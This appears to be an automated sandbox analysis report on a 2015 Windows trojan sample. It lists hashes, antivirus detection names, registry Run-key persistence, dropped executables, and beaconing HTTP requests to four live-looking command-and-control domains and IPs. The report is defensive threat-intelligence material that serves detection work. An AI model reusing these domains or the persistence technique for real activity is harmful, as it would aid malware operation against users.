Analysis Date: 2015-08-27 05:33:48
MD5: 7162f992bbbb23a8f1233657b99653e6
SHA1: 5e7a0e72cc28fbbc89259e3fbb084f388d9d6339

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a6fc1876169f28bd22c87687a6b93266 sha1: 3c12021efecef7b434c51cd9866e4b9efa365bec size: 300544
Section .rdata md5: 5e886242c5fe802d7df68f8f922eb3b1 sha1: eb3e0492aca7de37cfc7d6b47eb3b919c6a28c69 size: 34304
Section .data md5: 12e28a780c9bea38d6083d8775df61d6 sha1: a898b047106e896e44edf995dc9d3a99d89112cb size: 104448
Timestamp: 2014-10-30 10:10:09
Packer: Microsoft Visual C++ ?.?
PEhash: 26768acc75c7c773fb2dd5883dc6e4ff5893b00c
IMPhash: 12ad70a94c4c136836a8bb73d2a63cb8
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader15.31020
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!7162F992BBBB
AV Rising: 0x58045a30

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Multimedia Block Provider Quality NGEN ➝ C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\rzjykkuzwzmm.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.fku5
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe"

Network Details:

DNS: leavethrown.net (Type: A) ➝ 95.211.230.75
DNS: simplechoose.net (Type: A) ➝ 123.108.108.168
DNS: possibleperiod.net (Type: A) ➝ 192.64.119.216
DNS: finishperiod.net (Type: A) ➝ 50.63.202.32
HTTP GET: http://leavethrown.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GET: http://simplechoose.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GET: http://possibleperiod.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GET: http://finishperiod.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1032 ➝ 123.108.108.168:80
Flows TCP: 192.168.1.1:1033 ➝ 192.64.119.216:80
Flows TCP: 192.168.1.1:1034 ➝ 50.63.202.32:80

Raw Pcap

Strings